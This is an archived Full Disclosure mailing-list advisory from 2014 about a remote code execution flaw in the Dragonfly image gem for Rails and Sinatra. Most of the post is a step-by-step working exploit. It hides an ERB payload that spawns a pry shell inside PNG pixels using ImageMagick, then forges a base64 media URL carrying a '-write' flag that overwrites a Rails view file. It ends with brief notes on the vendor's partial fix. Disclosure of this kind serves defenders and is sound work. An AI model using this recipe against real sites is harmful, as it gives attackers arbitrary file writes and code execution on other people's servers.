[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] RCE in dragonfly gem
From: leex <leex () room ! me>
Date: 2014-08-25 21:44:08
Message-ID: 53FBAE28.8030900 () room ! me
[Download RAW message or body]
RCE in the Dragonfly gem for image uploading & processing in
rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly)
The underlaying vulnerability is that you can pass arbitrary commands to
imagemagicks convert, thus granting arbitrary read/write for the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.
Here is a description of _one_ way of how to abuse the RCE vulnerability:
$cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$wc exploit.rb
3 13 63 exploit.rb
char length needs to be multiple of 3 (21x3 = 63) because every pixel in
a png
will contain 1 byte
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
test that everything went well:
$convert exploit.png test.rgb
diff should not show any diffs:
$diff -v test.rgb exploit.rb
upload the picture
copy the image url
eg:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0
open pry or irb and run:
Base64.decode64
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
=>
"[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"thumb\",\"400x200#\"]]"
Base64.strict_encode64
[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"convert\",\"-write
rgb:/path/to/rails/app/views/photos/index.html.erb\"]]"
=>
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="
go to your browser and request:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZl \
cnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0= and \
then: http://domain.tld/photos/ which will open app/views/photos/index.html.erb and spawn a pry \
on the terminal
you called rails server from.
Of course you can use different imagemagick flags than "write" to
achieve the same code execution. So this would really call for a
whitelist that restricts the commands that can be send to imagemagick.
The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e).
The main fix seems to be "'rename dos_prevention' to 'verify urls
(recommended)'". Needless to say, many websites out there will still
disable the verification for ease of deployment of e.g. javascript that
requests thumbnail versions of images. Note that this vulnerability is
still exploitable if the attacker is unable to upload images, by using
the generators to "draw" arbitrary images by imagemagick commands.
cheers,
coco & leex
http://hexgolems.com/fd/dragonfly.txt
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic